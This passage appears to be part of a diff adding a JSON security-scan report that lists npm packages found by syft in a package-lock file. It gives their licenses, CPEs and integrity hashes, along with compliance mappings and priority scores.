"Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b36a32eeee7b64f7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: bidi-js 1.0.3", + "title": "bidi-js 1.0.3", + "description": "Package discovered: bidi-js 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "983a70fcd42b01da", + "name": "bidi-js", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:bidi-js:bidi-js:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:bidi-js:bidi_js:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:bidi_js:bidi-js:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:bidi_js:bidi_js:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:bidi:bidi-js:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:bidi:bidi_js:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/bidi-js@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/bidi-js/-/bidi-js-1.0.3.tgz", + "integrity": "sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==", + "dependencies": { + "require-from-string": "^2.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2fa656db5288bebd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: bignumber.js 9.3.1", + "title": "bignumber.js 9.3.1", + "description": "Package discovered: bignumber.js 9.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0debd0f90c403668", + "name": "bignumber.js", + "version": "9.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:bignumber.js:bignumber.js:9.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/bignumber.js@9.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/bignumber.js/-/bignumber.js-9.3.1.tgz", + "integrity": "sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7dd5ae9dd664c020", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: binary-extensions 2.3.0", + "title": "binary-extensions 2.3.0", + "description": "Package discovered: binary-extensions 2.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a472eb11fead94f4", + "name": "binary-extensions", + "version": "2.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:binary-extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:binary-extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:binary_extensions:binary-extensions:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:binary_extensions:binary_extensions:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:binary:binary-extensions:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:binary:binary_extensions:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/binary-extensions@2.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.3.0.tgz", + "integrity": "sha512-Ceh+7ox5qe7LJuLHoY0feh3pHuUDHAcRUeyL2VYghZwfpkNIy/+8Ocg0a3UuSoYzavmylwuLWQOf3hl0jjMMIw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d29a5e4fb92420c3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: body-parser 1.20.5", + "title": "body-parser 1.20.5", + "description": "Package discovered: body-parser 1.20.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "04b33f5cfaf593a5", + "name": "body-parser", + "version": "1.20.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:openjsf:body-parser:1.20.5:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/body-parser@1.20.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.5.tgz", + "integrity": "sha512-3grm+/2tUOvu2cjJkvsIxrv/wVpfXQW4PsQHYm7yk4vfpu7Ekl6nEsYBoJUL6qDwZUx8wUhQ8tR2qz+ad9c9OA==", + "dependencies": { + "bytes": "~3.1.2", + "content-type": "~1.0.5", + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "~1.2.0", + "http-errors": "~2.0.1", + "iconv-lite": "~0.4.24", + "on-finished": "~2.4.1", + "qs": "~6.15.1", + "raw-body": "~2.5.3", + "type-is": "~1.6.18", + "unpipe": "~1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8d245dad35d0de48", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: brace-expansion 2.1.0", + "title": "brace-expansion 2.1.0", + "description": "Package discovered: brace-expansion 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "833f3564230327b0", + "name": "brace-expansion", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:brace-expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:brace-expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:brace_expansion:brace-expansion:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:brace_expansion:brace_expansion:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:brace:brace-expansion:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:brace:brace_expansion:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/brace-expansion@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.1.0.tgz", + "integrity": "sha512-TN1kCZAgdgweJhWWpgKYrQaMNHcDULHkWwQIspdtjV4Y5aurRdZpjAqn6yX3FPqTA9ngHCc4hJxMAMgGfve85w==", + "dependencies": { + "balanced-match": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2c758a1366af3ce7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: braces 3.0.3", + "title": "braces 3.0.3", + "description": "Package discovered: braces 3.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e8863a3d87ad712b", + "name": "braces", + "version": "3.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:braces_project:braces:3.0.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + }, + { + "cpe": "cpe:2.3:a:jonschlinkert:braces:3.0.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/braces@3.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", + "dependencies": { + "fill-range": "^7.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4acea70fbe4d3073", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: brotli 1.3.3", + "title": "brotli 1.3.3", + "description": "Package discovered: brotli 1.3.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6bc686959e36e164", + "name": "brotli", + "version": "1.3.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:brotli:brotli:1.3.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/brotli@1.3.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/brotli/-/brotli-1.3.3.tgz", + "integrity": "sha512-oTKjJdShmDuGW94SyyaoQvAjf30dZaHnjJ8uAF+u2/vGJkJbJPJAT1gDiOJP5v1Zb6f9KEyW/1HpuaWIXtGHPg==", + "dependencies": { + "base64-js": "^1.1.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "08e716a2d2fe7179", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: browserify-zlib 0.2.0", + "title": "browserify-zlib 0.2.0", + "description": "Package discovered: browserify-zlib 0.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "adb6ab9adab6e7b8", + "name": "browserify-zlib", + "version": "0.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:browserify-zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:browserify-zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:browserify_zlib:browserify-zlib:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:browserify_zlib:browserify_zlib:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:browserify:browserify-zlib:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:browserify:browserify_zlib:0.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/browserify-zlib@0.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/browserify-zlib/-/browserify-zlib-0.2.0.tgz", + "integrity": "sha512-Z942RysHXmJrhqk88FmKBVq/v5tqmSkDz7p54G/MGyjMnCFFnC79XWNbg+Vta8W6Wb2qtSZTSxIGkJrRpCFEiA==", + "dependencies": { + "pako": "~1.0.5" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "27d8113ce8ad07e6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: browserslist 4.28.2", + "title": "browserslist 4.28.2", + "description": "Package discovered: browserslist 4.28.2", + "remediation": 